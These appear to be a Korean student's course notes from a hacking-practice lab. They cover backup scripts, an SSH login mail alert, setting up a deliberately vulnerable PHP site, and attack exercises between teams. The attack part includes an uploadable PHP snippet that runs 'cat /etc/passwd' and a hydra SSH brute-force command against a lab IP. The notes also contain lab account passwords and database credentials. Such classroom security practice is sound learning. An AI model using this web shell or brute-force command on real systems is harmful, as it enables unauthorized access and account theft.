●40일차(20250211040.php)
백업서버 접속
> ssh master@125.246.95.253:22102
본서버 접속
> ssh master@125.246.95.253:22001
# 백업 서버 세팅
cd /home
> nano backup.sh
#!/bin/sh
set $(date)
fname="backup-team1$1$2$3.tar.gz"
tar cvzf /backup/$fname /home
> chmod 755
./backup.sh
> backup.sh 실행
rsync -avz --exclude-from=/etc/rsync_exclude.lst /backup 10.10.10.102::backup
> --delete는 코드에서 지워줌
> /etc에 touch rsync_exclude.lst
> 백업됨
# 3대 서버 자동 메일 세팅
nano /etc/profile에 alert.sh 코드 추가
> 모든 계정에 누군가 접속할때 메일이 감
IP="$(echo $SSH_CONNECTION | cut -d " " -f 1)"
HOSTNAME=$(hostname)
NOW=$(date +"%e %b %Y, %a %r")
echo 'Someone from '$IP' logged into '$HOSTNAME' on '$NOW'.' | mail -s 'SSH Login Notification' master@mail.st.kr
echo "test" | mail -s "title" master@mail.st.kr
> 가는지 확인
mailutils
> 자동메일 보낼때 mail이라는 명령어를 사용하기 위해서 깔아야함
+) ftp
vsftpd를 깔아야 ftp로 editplus 들어가짐
+) dns
컴퓨터 dns를 125.246.95.253으로 설정
> web1.st.kr:8001으로 들어가짐
> 원래는 192.168.0.99였음
#web1.st.kr 세팅
> 해킹 실습을 위해 취약한 사이트를 활성화
1. index.html
web1.st.kr로 들어가면 index.php로 들어가야하는데 안됨
> index.html을 지우자
> index.html이 index.php보다 우선이다
2. login
login_chk로 안넘어감
> dbconfig.php > web1,web1,123456
> web1 계정 비밀번호가 다른 비밀번호여도 데이터베이스는 별개임
> 데이터베이스 넣고
CREATE DATABASE web1;
CREATE USER 'web1'@'localhost' IDENTIFIED BY '123456';
GRANT ALL PRIVILEGES ON web1.* TO 'web1'@'localhost';
FLUSH PRIVILEGES;
> webhack.sql에 있는 테이블 넣고
+) 윈도우10에서는 경로를 넘어갈때 어디 코드 어디 줄이 이상하다고 알려주지 않는다
> 찾지 못한다고 나옴
#해킹 실습
1. 방어
sudo passwd -l user (lock)
sudo passwd -u user (풀기)
> 활성화된 계정들만 알려줌
master 7007
web1 8520
web2 6627
root 0770
> 비밀번호 바꿔줌(sudo passwd 계정명)
tcpdump -i enp0s3 -e tcp
> tcp로 들어오는 흔적 찾기
> 근데 너무 많이 들어옴 > 필터링을 걸어야함
+) 누가 들어와서 흔적을 남김
cd /web1/public_html/1.txt가 생김
cd /web1/public_html/logs/1.txt > ls -al > 16:54
2. 해킹
<?php
print "SUCCESS";
system('cat /etc/passwd');
?>
> 웹에 업로드하면 계정들이 나옴
kali > NAT(DHCP)
>> ping 125.246.95.253
hydra -L account.txt -P password.txt 125.246.95.253 ssh -s 22003 (3조 공격)
> 당연히 kali 안에 accunts.txt(계정명) password.txt(비밀번호 자료)가 있어야한다
계정명과 비밀번호를 구하고 접속
> 어디 하나를 바꿔서 나오자
> 진짜 해커들은 안에 데이터를 전부 지우고 나올것임